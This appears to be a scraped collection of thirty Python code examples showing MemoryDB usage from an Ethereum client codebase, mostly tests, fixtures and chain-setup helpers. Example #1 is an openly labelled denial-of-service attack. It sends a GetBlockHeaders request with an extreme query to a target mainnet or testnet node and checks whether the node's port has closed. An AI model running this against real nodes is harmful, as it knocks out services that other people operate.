Example #1
def _exp(node_url, chain) -> None:
    """Connect to the target node, send it a GetBlockHeaders request with
    extreme query parameters, then re-probe the port to see whether the
    remote node has gone down."""

    from evm.chains.ropsten import RopstenChain, ROPSTEN_GENESIS_HEADER, ROPSTEN_VM_CONFIGURATION
    from evm.db.backends.memory import MemoryDB
    from tests.p2p.integration_test_helpers import FakeAsyncHeaderDB, connect_to_peers_loop

    ip, port = node_url.split('@')[1].split(':')
    if port_probe(ip, port):
        print('The port is open, starting to attack...')
    peer_class = LESPeer
    peer_pool = None
    if chain == 'mainnet':
        block_hash = '0xd4e56740f876aef8c010b86a40d5f56745a118d0906a34e69aec8c0db1cb8fa3'
        headerdb = FakeAsyncHeaderDB(MemoryDB())
        headerdb.persist_header(MAINNET_GENESIS_HEADER)
        network_id = MainnetChain.network_id
        nodes = [Node.from_uri(node_url)]
        peer_pool = PeerPool(peer_class, headerdb, network_id,
                             ecies.generate_privkey(),
                             MAINNET_VM_CONFIGURATION)
    elif chain == 'testnet':
        block_hash = '0x41941023680923e0fe4d74a34bdac8141f2540e3ae90623718e47d66d1ca4a2d'
        headerdb = FakeAsyncHeaderDB(MemoryDB())
        headerdb.persist_header(ROPSTEN_GENESIS_HEADER)
        network_id = RopstenChain.network_id
        nodes = [Node.from_uri(node_url)]
        peer_pool = PeerPool(peer_class, headerdb, network_id,
                             ecies.generate_privkey(),
                             ROPSTEN_VM_CONFIGURATION)
    loop = asyncio.get_event_loop()

    async def attack() -> None:
        nonlocal peer_pool
        nonlocal block_hash
        while not peer_pool.peers:
            print("Waiting for peer connection...")
            await asyncio.sleep(1)
        peer = cast(LESPeer, peer_pool.peers[0])
        cmd = GetBlockHeaders(peer.sub_proto.cmd_id_offset)
        data = {
            'request_id': 1,
            'query': GetBlockHeadersQuery(
                decode_hex(block_hash), 1, 0xffffffffffffffff, False),
        }
        header, body = cmd.encode(data)
        peer.sub_proto.send(header, body)
        await asyncio.sleep(1)
        result = port_probe(ip, port)
        if not result:
            print('The port is closed, attack succeeded...')
            exit()

    t1 = asyncio.ensure_future(connect_to_peers_loop(peer_pool, nodes))
    t2 = asyncio.ensure_future(attack())
    loop.set_debug(True)
    loop.run_until_complete(asyncio.wait([t1, t2]))
    loop.close()
Example #2
    def create_block(cls, transaction_packages, prev_hashes, coinbase,
                     parent_header):
        """
        Create a block with transaction witness
        """
        block = cls.generate_block_from_parent_header_and_coinbase(
            parent_header,
            coinbase,
        )

        recent_trie_nodes = {}
        receipts = []
        for (transaction, transaction_witness) in transaction_packages:
            transaction_witness.update(recent_trie_nodes)
            witness_db = BaseChainDB(MemoryDB(transaction_witness))

            execution_context = ExecutionContext.from_block_header(
                block.header, prev_hashes)
            vm_state = cls.get_state_class()(
                chaindb=witness_db,
                execution_context=execution_context,
                state_root=block.header.state_root,
                receipts=receipts,
            )
            computation, result_block, _ = vm_state.apply_transaction(
                transaction=transaction,
                block=block,
                is_stateless=True,
            )

            if not computation.is_error:
                block = result_block
                receipts = computation.vm_state.receipts
                recent_trie_nodes.update(
                    computation.vm_state.access_logs.writes)
            else:
                # The transaction failed: keep the previous block and receipts.
                pass

        # Finalize
        witness_db = BaseChainDB(MemoryDB(recent_trie_nodes))
        execution_context = ExecutionContext.from_block_header(
            block.header, prev_hashes)
        vm_state = cls.get_state_class()(
            chaindb=witness_db,
            execution_context=execution_context,
            state_root=block.header.state_root,
            receipts=receipts,
        )
        block = vm_state.finalize_block(block)

        return block
Example #3
def _test():
    import argparse
    from evm.p2p import ecies
    from evm.chains.ropsten import RopstenChain, ROPSTEN_GENESIS_HEADER
    from evm.db.backends.level import LevelDB
    from evm.db.backends.memory import MemoryDB
    logging.basicConfig(level=logging.INFO,
                        format='%(levelname)s: %(message)s')

    parser = argparse.ArgumentParser()
    parser.add_argument('-db', type=str, required=True)
    parser.add_argument('-root-hash',
                        type=str,
                        required=True,
                        help='Hex encoded root hash')
    args = parser.parse_args()

    chaindb = BaseChainDB(MemoryDB())
    chaindb.persist_header_to_db(ROPSTEN_GENESIS_HEADER)
    peer_pool = PeerPool(ETHPeer, chaindb, RopstenChain.network_id,
                         ecies.generate_privkey())
    asyncio.ensure_future(peer_pool.run())

    state_db = LevelDB(args.db)
    root_hash = decode_hex(args.root_hash)
    downloader = StateDownloader(state_db, root_hash, peer_pool)
    loop = asyncio.get_event_loop()
    try:
        loop.run_until_complete(downloader.run())
    except KeyboardInterrupt:
        pass

    loop.run_until_complete(downloader.stop())
    loop.run_until_complete(peer_pool.stop())
    loop.close()
Example #4
async def test_peer_pool_connect(monkeypatch, event_loop,
                                 receiver_server_with_dumb_peer):
    started_peers = []

    def mock_start_peer(peer):
        nonlocal started_peers
        started_peers.append(peer)

    monkeypatch.setattr(receiver_server_with_dumb_peer, '_start_peer',
                        mock_start_peer)

    network_id = 1
    discovery = None
    pool = PeerPool(DumbPeer, HeaderDB(MemoryDB()), network_id,
                    INITIATOR_PRIVKEY, discovery)
    nodes = [RECEIVER_REMOTE]
    await pool._connect_to_nodes(nodes)
    # Give the receiver_server a chance to ack the handshake.
    await asyncio.sleep(0.1)

    assert len(started_peers) == 1
    assert len(pool.connected_nodes) == 1

    # Stop our peer to make sure its pending asyncio tasks are cancelled.
    await list(pool.connected_nodes.values())[0].cancel()
Example #5
async def test_shard_syncer(connections, request, event_loop):
    peers_by_server = {}
    for server_id1, server_id2 in connections:
        peer1, peer2 = await get_directly_linked_sharding_peers(
            request, event_loop)
        peers_by_server.setdefault(server_id1, []).append(peer1)
        peers_by_server.setdefault(server_id2, []).append(peer2)

    syncers = []
    for _, peers in sorted(peers_by_server.items()):
        peer_pool = MockPeerPoolWithConnectedPeers(peers)
        shard_db = ShardDB(MemoryDB())
        syncer = ShardSyncer(Shard(shard_db, 0), peer_pool)
        syncers.append(syncer)
        asyncio.ensure_future(syncer.run())

    def finalizer():
        event_loop.run_until_complete(
            asyncio.gather(*[syncer.cancel() for syncer in syncers]))

    request.addfinalizer(finalizer)

    # let each node propose and check that collation appears at all other nodes
    for proposer in syncers:
        collation = proposer.propose()
        await asyncio.wait_for(
            asyncio.gather(*[
                syncer.collations_received_event.wait()
                for syncer in syncers
                if syncer != proposer
            ]),
            timeout=2,
        )
        for syncer in syncers:
            assert syncer.shard.get_collation_by_hash(
                collation.hash) == collation
Example #6
async def test_peer_pool_connect(monkeypatch, event_loop,
                                 receiver_server_with_dumb_peer):
    started_peers = []

    def mock_start_peer(peer):
        nonlocal started_peers
        started_peers.append(peer)

    monkeypatch.setattr(receiver_server_with_dumb_peer, '_start_peer',
                        mock_start_peer)
    # We need this to ensure the server can check if the peer pool is full for
    # incoming connections.
    monkeypatch.setattr(receiver_server_with_dumb_peer, 'peer_pool',
                        MockPeerPool())

    pool = PeerPool(DumbPeer, HeaderDB(MemoryDB()), NETWORK_ID,
                    INITIATOR_PRIVKEY, tuple())
    nodes = [RECEIVER_REMOTE]
    await pool.connect_to_nodes(nodes)
    # Give the receiver_server a chance to ack the handshake.
    await asyncio.sleep(0.1)

    assert len(started_peers) == 1
    assert len(pool.connected_nodes) == 1

    # Stop our peer to make sure its pending asyncio tasks are cancelled.
    await list(pool.connected_nodes.values())[0].cancel()
Example #7
async def test_syncer_requests_new_collations(request, event_loop):
    # setup a-b topology
    peer_a_b, peer_b_a = await get_directly_linked_sharding_peers(request, event_loop)
    peer_a_b_subscriber = MockPeerPoolSubscriber()
    peer_a_b.add_subscriber(peer_a_b_subscriber)
    peer_pool_b = MockPeerPoolWithConnectedPeers([peer_b_a])

    # setup shard dbs at b
    shard_db = ShardDB(MemoryDB())
    shard = Shard(shard_db, 0)

    # start shard syncer
    syncer = ShardSyncer(shard, peer_pool_b)
    asyncio.ensure_future(syncer.run())

    def finalizer():
        event_loop.run_until_complete(syncer.cancel())
    request.addfinalizer(finalizer)

    # notify b about new hashes at a and check that it requests them
    hashes_and_periods = ((b"\xaa" * 32, 0),)
    peer_a_b.sub_proto.send_new_collation_hashes(hashes_and_periods)
    peer, cmd, msg = await asyncio.wait_for(
        peer_a_b_subscriber.msg_queue.get(),
        timeout=1,
    )
    assert peer == peer_a_b
    assert isinstance(cmd, GetCollations)
    assert msg["collation_hashes"] == (hashes_and_periods[0][0],)
Example #8
async def test_syncer_proposing(request, event_loop):
    # setup a-b topology
    peer_a_b, peer_b_a = await get_directly_linked_sharding_peers(request, event_loop)
    peer_a_b_subscriber = MockPeerPoolSubscriber()
    peer_a_b.add_subscriber(peer_a_b_subscriber)
    peer_pool_b = MockPeerPoolWithConnectedPeers([peer_b_a])

    # setup shard dbs at b
    shard_db = ShardDB(MemoryDB())
    shard = Shard(shard_db, 0)

    # start shard syncer
    syncer = ShardSyncer(shard, peer_pool_b)
    asyncio.ensure_future(syncer.run())

    def finalizer():
        event_loop.run_until_complete(syncer.cancel())
    request.addfinalizer(finalizer)

    # propose at b and check that it announces its proposal
    syncer.propose()
    peer, cmd, msg = await asyncio.wait_for(
        peer_a_b_subscriber.msg_queue.get(),
        timeout=1,
    )
    assert peer == peer_a_b
    assert isinstance(cmd, NewCollationHashes)
    assert len(msg["collation_hashes_and_periods"]) == 1
    proposed_hash = msg["collation_hashes_and_periods"][0][0]

    # test that the collation has been added to the shard
    shard.get_collation_by_hash(proposed_hash)
Example #9
def _make_trie_root_and_nodes(items: Tuple[bytes, ...]) -> Tuple[bytes, Dict[bytes, bytes]]:
    kv_store = {}  # type: Dict[bytes, bytes]
    trie = HexaryTrie(MemoryDB(kv_store), BLANK_ROOT_HASH)
    for index, item in enumerate(items):
        index_key = rlp.encode(index, sedes=rlp.sedes.big_endian_int)
        trie[index_key] = item
    return trie.root_hash, kv_store
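A minimal usage sketch for the helper above (assuming it is in scope, that MemoryDB comes from evm.db.backends.memory as in the other examples, and that HexaryTrie is the standard trie-package class; the item payloads are made-up placeholders): the returned kv_store holds every trie node, so the trie can be rebuilt from it and queried by the same index keys.

import rlp
from trie import HexaryTrie

from evm.db.backends.memory import MemoryDB

items = (b'first-item', b'second-item')  # hypothetical payloads
root_hash, kv_store = _make_trie_root_and_nodes(items)

# kv_store now contains every node of the trie, so the trie can be rebuilt
# from it and queried by the same RLP-encoded index keys.
restored = HexaryTrie(MemoryDB(kv_store), root_hash)
assert restored[rlp.encode(0, sedes=rlp.sedes.big_endian_int)] == items[0]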
Example #10
    def __init__(
        self,
        privkey: datatypes.PrivateKey,
        address: Address,
        network_id: int,
        min_peers: int = 0,
        peer_class: Type[BasePeer] = ShardingPeer,
        peer_pool_class: Type[PeerPool] = PeerPool,
        bootstrap_nodes: List[str] = [],
    ) -> None:
        BaseService.__init__(self, CancelToken('ShardingServer'))
        self.privkey = privkey
        self.address = address
        self.network_id = network_id
        self.peer_class = peer_class
        self.discovery = DiscoveryProtocol(
            self.privkey, self.address, bootstrap_nodes=bootstrap_nodes)
        # XXX: This is not supposed to work and causes both the PeerPool and Server to crash, but
        # the tests in test_sharding.py don't seem to care
        self.headerdb = None
        self.peer_pool = peer_pool_class(
            peer_class,
            self.headerdb,
            self.network_id,
            self.privkey,
            self.discovery,
            min_peers=min_peers,
        )
        shard_db = ShardDB(MemoryDB())
        shard = Shard(shard_db, 0)
        self.syncer = ShardSyncer(shard, self.peer_pool, self.cancel_token)  # type: ignore
Example #11
def chaindb_mainnet_100():
    """Return a chaindb with mainnet headers numbered from 0 to 100."""
    here = os.path.dirname(__file__)
    with open(os.path.join(here, 'testdata', 'sample_1000_headers_rlp'), 'rb') as f:
        headers_rlp = f.read()
    headers = rlp.decode(headers_rlp, sedes=sedes.CountableList(BlockHeader))
    chaindb = BaseChainDB(MemoryDB())
    for i in range(0, 101):
        chaindb.persist_header_to_db(headers[i])
    return chaindb
Example #12
def headerdb_mainnet_100():
    """Return a headerdb with mainnet headers numbered from 0 to 100."""
    here = os.path.dirname(__file__)
    with open(os.path.join(here, 'fixtures', 'sample_1000_headers_rlp'), 'rb') as f:
        headers_rlp = f.read()
    headers = rlp.decode(headers_rlp, sedes=sedes.CountableList(BlockHeader))
    headerdb = FakeAsyncChainDB(MemoryDB())
    for i in range(0, 101):
        headerdb.persist_header(headers[i])
    return headerdb
Example #13
def db(request):
    base_db = MemoryDB()
    if request.param is JournalDB:
        return JournalDB(base_db)
    elif request.param is BatchDB:
        return BatchDB(base_db)
    elif request.param is MemoryDB:
        return base_db
    else:
        raise Exception("Invariant")
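The fixture above reads request.param, so it is presumably registered with pytest's params mechanism. A minimal sketch of that registration follows; the decorator and the JournalDB/BatchDB import paths are assumptions and are not shown in the original snippet.

import pytest

from evm.db.backends.memory import MemoryDB
from evm.db.journal import JournalDB  # assumed import path
from evm.db.batch import BatchDB      # assumed import path


@pytest.fixture(params=[JournalDB, BatchDB, MemoryDB])
def db(request):
    # request.param is one of the three classes above: wrap the in-memory
    # base DB for JournalDB/BatchDB, or return it directly for MemoryDB.
    base_db = MemoryDB()
    if request.param is JournalDB:
        return JournalDB(base_db)
    elif request.param is BatchDB:
        return BatchDB(base_db)
    return base_db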
Example #14
def make_trie_root_and_nodes(transactions, trie_class=HexaryTrie):
    chaindb = BaseChainDB(MemoryDB())
    db = chaindb.db
    transaction_db = trie_class(db)

    for index, transaction in enumerate(transactions):
        index_key = rlp.encode(index, sedes=rlp.sedes.big_endian_int)
        transaction_db[index_key] = rlp.encode(transaction)

    return transaction_db.root_hash, transaction_db.db.wrapped_db.kv_store
Example #15
def test_access_restriction():
    # populate db
    state = ShardingAccountStateDB(MemoryDB())
    state.set_balance(ADDRESS, 2)
    state.set_code(ADDRESS, b"code")
    state.set_storage(ADDRESS, 123, 4)

    original_db = state.db
    original_root_hash = state.root_hash

    def make_state(access_list):
        kv_store = copy.deepcopy(original_db.wrapped_db.kv_store)
        db = MemoryDB(kv_store)
        return ShardingAccountStateDB(db,
                                      original_root_hash,
                                      access_list=access_list)

    # access lists to use
    CODE_ACCESS_LIST = [get_code_key(ADDRESS)]
    BALANCE_ACCESS_LIST = [get_balance_key(ADDRESS)]
    STORAGE_ACCESS_LIST = [get_storage_key(ADDRESS, 123)]

    # test with access list
    state = make_state(BALANCE_ACCESS_LIST)
    state.get_balance(ADDRESS)
    state.set_balance(ADDRESS, 3)
    state.delta_balance(ADDRESS, 1)

    state = make_state(CODE_ACCESS_LIST)
    state.get_code(ADDRESS)
    state.set_code(ADDRESS, b"new_code")

    state = make_state(STORAGE_ACCESS_LIST)
    state.get_storage(ADDRESS, 123)
    state.set_storage(ADDRESS, 123, 5)

    # test without access list
    state = make_state([])
    with pytest.raises(UnannouncedStateAccess):
        state.get_balance(ADDRESS)
    with pytest.raises(UnannouncedStateAccess):
        state.set_balance(ADDRESS, 3)
    with pytest.raises(UnannouncedStateAccess):
        state.delta_balance(ADDRESS, 1)

    with pytest.raises(UnannouncedStateAccess):
        state.get_code(ADDRESS)
    with pytest.raises(UnannouncedStateAccess):
        state.set_code(ADDRESS, b"new_code")

    with pytest.raises(UnannouncedStateAccess):
        state.get_storage(ADDRESS, 123)
    with pytest.raises(UnannouncedStateAccess):
        state.set_storage(ADDRESS, 123, 5)
Example #16
def get_chain(vm: Type[BaseVM]) -> Chain:
    return chain_without_pow(
        MemoryDB(), vm, GENESIS_PARAMS,
        genesis_state([
            AddressSetup(address=FUNDED_ADDRESS,
                         balance=DEFAULT_INITIAL_BALANCE,
                         code=b''),
            AddressSetup(address=SECOND_EXISTING_ADDRESS,
                         balance=DEFAULT_INITIAL_BALANCE,
                         code=b'')
        ]))
Example #17
def get_server(privkey, address, peer_class):
    bootstrap_nodes = []
    chaindb = ChainDB(MemoryDB())
    server = Server(
        privkey,
        address,
        chaindb,
        bootstrap_nodes,
        network_id=1,
        min_peers=1,
        peer_class=peer_class,
    )
    return server
Example #18
def chaindb_20():
    chain = PoWMiningChain.from_genesis(MemoryDB(), GENESIS_PARAMS, GENESIS_STATE)
    for i in range(20):
        tx = chain.create_unsigned_transaction(
            nonce=i,
            gas_price=1234,
            gas=1234000,
            to=RECEIVER.public_key.to_canonical_address(),
            value=i,
            data=b'',
        )
        chain.apply_transaction(tx.as_signed_transaction(SENDER))
        chain.mine_block()
    return chain.chaindb
Example #19
def get_server(privkey, address, bootstrap_nodes=None, peer_class=DumbPeer):
    if bootstrap_nodes is None:
        bootstrap_nodes = []
    chaindb = ChainDB(MemoryDB())
    server = Server(
        privkey,
        address,
        chaindb,
        bootstrap_nodes,
        1,
        min_peers=1,
        peer_class=peer_class,
    )
    return server
Example #20
def new_chain_from_fixture(fixture):
    base_db = MemoryDB()

    vm_config = chain_vm_configuration(fixture)

    ChainFromFixture = MainnetChain.configure(
        'ChainFromFixture',
        vm_configuration=vm_config,
    )

    return ChainFromFixture.from_genesis(
        base_db,
        genesis_params=genesis_params_from_fixture(fixture),
        genesis_state=fixture['pre'],
    )
Example #21
def make_random_state(n):
    state_db = MainAccountStateDB(MemoryDB())
    contents = {}
    for _ in range(n):
        addr = os.urandom(20)
        state_db.touch_account(addr)
        balance = random.randint(0, 10000)
        state_db.set_balance(addr, balance)
        nonce = random.randint(0, 10000)
        state_db.set_nonce(addr, nonce)
        storage = random.randint(0, 10000)
        state_db.set_storage(addr, 0, storage)
        code = b'not-real-code'
        state_db.set_code(addr, code)
        contents[addr] = (balance, nonce, storage, code)
    return state_db, contents
Example #22
def get_server(privkey, address, peer_class):
    base_db = MemoryDB()
    headerdb = HeaderDB(base_db)
    chaindb = ChainDB(base_db)
    chaindb.persist_header(ROPSTEN_GENESIS_HEADER)
    chain = RopstenChain(base_db)
    server = Server(
        privkey,
        address.tcp_port,
        chain,
        chaindb,
        headerdb,
        base_db,
        network_id=NETWORK_ID,
        peer_class=peer_class,
    )
    return server
Example #23
def test_pow_mining():
    sender = keys.PrivateKey(
        decode_hex(
            "49a7b37aa6f6645917e7b807e9d1c00d4fa71f18343b0d4122a4d2df64dd6fee")
    )
    receiver = keys.PrivateKey(
        decode_hex(
            "b71c71a67e1177ad4e901695e1b4b9ee17ae16c6668d313eac2f96dbcda3f291")
    )
    genesis_params = {
        'parent_hash': constants.GENESIS_PARENT_HASH,
        'uncles_hash': constants.EMPTY_UNCLE_HASH,
        'coinbase': constants.ZERO_ADDRESS,
        'transaction_root': constants.BLANK_ROOT_HASH,
        'receipt_root': constants.BLANK_ROOT_HASH,
        'bloom': 0,
        'difficulty': 5,
        'block_number': constants.GENESIS_BLOCK_NUMBER,
        'gas_limit': constants.GENESIS_GAS_LIMIT,
        'gas_used': 0,
        'timestamp': 1514764800,
        'extra_data': constants.GENESIS_EXTRA_DATA,
        'nonce': constants.GENESIS_NONCE
    }
    state = {
        sender.public_key.to_canonical_address(): {
            "balance": 100000000000000000,
            "code": b"",
            "nonce": 0,
            "storage": {}
        }
    }
    chain = PowMiningChain.from_genesis(MemoryDB(), genesis_params, state)
    for i in range(10):
        tx = chain.create_unsigned_transaction(
            nonce=i,
            gas_price=1234,
            gas=1234000,
            to=receiver.public_key.to_canonical_address(),
            value=i,
            data=b'',
        )
        chain.apply_transaction(tx.as_signed_transaction(sender))
        block = chain.mine_block()
        assert block.number == i + 1
        assert chain.header.block_number == i + 2
Example #24
def get_server(privkey, address, peer_class):
    db = MemoryDB()
    headerdb = HeaderDB(db)
    chaindb = ChainDB(db)
    chaindb.persist_header(ROPSTEN_GENESIS_HEADER)
    chain = RopstenChain(chaindb)
    server = Server(
        privkey,
        address,
        chain,
        chaindb,
        headerdb,
        db,
        network_id=1,
        min_peers=1,
        peer_class=peer_class,
    )
    return server
Example #25
def test_state_sync():
    state_db, contents = make_random_state(1000)
    dest_db = MemoryDB()
    scheduler = StateSync(state_db.root_hash, dest_db)
    requests = scheduler.next_batch(10)
    while requests:
        results = []
        for request in requests:
            results.append([request.node_key, state_db.db[request.node_key]])
        scheduler.process(results)
        requests = scheduler.next_batch(10)
    dest_state = MainAccountStateDB(dest_db, state_db.root_hash)
    for addr, account_data in contents.items():
        balance, nonce, storage, code = account_data
        assert dest_state.get_balance(addr) == balance
        assert dest_state.get_nonce(addr) == nonce
        assert dest_state.get_storage(addr, 0) == storage
        assert dest_state.get_code(addr) == code
Example #26
def make_random_state(n):
    raw_db = MemoryDB()
    account_db = AccountDB(raw_db)
    contents = {}
    for _ in range(n):
        addr = os.urandom(20)
        account_db.touch_account(addr)
        balance = random.randint(0, 10000)
        account_db.set_balance(addr, balance)
        nonce = random.randint(0, 10000)
        account_db.set_nonce(addr, nonce)
        storage = random.randint(0, 10000)
        account_db.set_storage(addr, 0, storage)
        code = b'not-real-code'
        account_db.set_code(addr, code)
        contents[addr] = (balance, nonce, storage, code)
    account_db.persist()
    return raw_db, account_db.state_root, contents
Example #27
async def test_new_collations_notification(request, event_loop):
    # setup a-b-c topology
    peer_a_b, peer_b_a = await get_directly_linked_sharding_peers(
        request, event_loop)
    peer_b_c, peer_c_b = await get_directly_linked_sharding_peers(
        request, event_loop)
    peer_c_b_subscriber = asyncio.Queue()
    peer_c_b.add_subscriber(peer_c_b_subscriber)
    peer_pool_b = MockPeerPoolWithConnectedPeers([peer_b_a, peer_b_c])

    # setup shard dbs at b
    shard_db = ShardDB(MemoryDB())
    shard = Shard(shard_db, 0)

    # start shard syncer
    syncer = ShardSyncer(shard, peer_pool_b)
    asyncio.ensure_future(syncer.run())

    def finalizer():
        event_loop.run_until_complete(syncer.cancel())

    request.addfinalizer(finalizer)

    # send collation from a to b and check that c gets notified
    c1 = next(collations)
    peer_a_b.sub_proto.send_collations(0, [c1])
    peer, cmd, msg = await asyncio.wait_for(
        peer_c_b_subscriber.get(),
        timeout=1,
    )
    assert peer == peer_c_b
    assert isinstance(cmd, NewCollationHashes)
    assert msg["collation_hashes_and_periods"] == ((c1.hash, c1.period), )

    # check that c won't be notified about c1 again
    c2 = next(collations)
    peer_a_b.sub_proto.send_collations(0, [c1, c2])
    peer, cmd, msg = await asyncio.wait_for(
        peer_c_b_subscriber.get(),
        timeout=1,
    )
    assert peer == peer_c_b
    assert isinstance(cmd, NewCollationHashes)
    assert msg["collation_hashes_and_periods"] == ((c2.hash, c2.period), )
Example #28
def _test():
    import argparse
    import signal
    from p2p import ecies
    from p2p.peer import HardCodedNodesPeerPool
    from evm.chains.ropsten import RopstenChain, ROPSTEN_GENESIS_HEADER
    from evm.db.backends.level import LevelDB
    from evm.db.backends.memory import MemoryDB
    from tests.p2p.integration_test_helpers import FakeAsyncChainDB
    logging.basicConfig(level=logging.INFO,
                        format='%(levelname)s: %(message)s')

    parser = argparse.ArgumentParser()
    parser.add_argument('-db', type=str, required=True)
    parser.add_argument('-root-hash',
                        type=str,
                        required=True,
                        help='Hex encoded root hash')
    args = parser.parse_args()

    chaindb = FakeAsyncChainDB(MemoryDB())
    chaindb.persist_header(ROPSTEN_GENESIS_HEADER)
    peer_pool = HardCodedNodesPeerPool(ETHPeer, chaindb,
                                       RopstenChain.network_id,
                                       ecies.generate_privkey())
    asyncio.ensure_future(peer_pool.run())

    state_db = LevelDB(args.db)
    root_hash = decode_hex(args.root_hash)
    downloader = StateDownloader(state_db, root_hash, peer_pool)
    loop = asyncio.get_event_loop()

    for sig in [signal.SIGINT, signal.SIGTERM]:
        loop.add_signal_handler(sig, downloader.cancel_token.trigger)

    async def run():
        # downloader.run() will run in a loop until the SIGINT/SIGTERM handler triggers its cancel
        # token, at which point it returns and we stop the pool and downloader.
        await downloader.run()
        await peer_pool.stop()
        await downloader.stop()

    loop.run_until_complete(run())
    loop.close()
Example #29
def base_db():
    return MemoryDB()
Example #30
def get_fresh_mainnet_chaindb():
    chaindb = BaseChainDB(MemoryDB())
    chaindb.persist_header_to_db(MAINNET_GENESIS_HEADER)
    return chaindb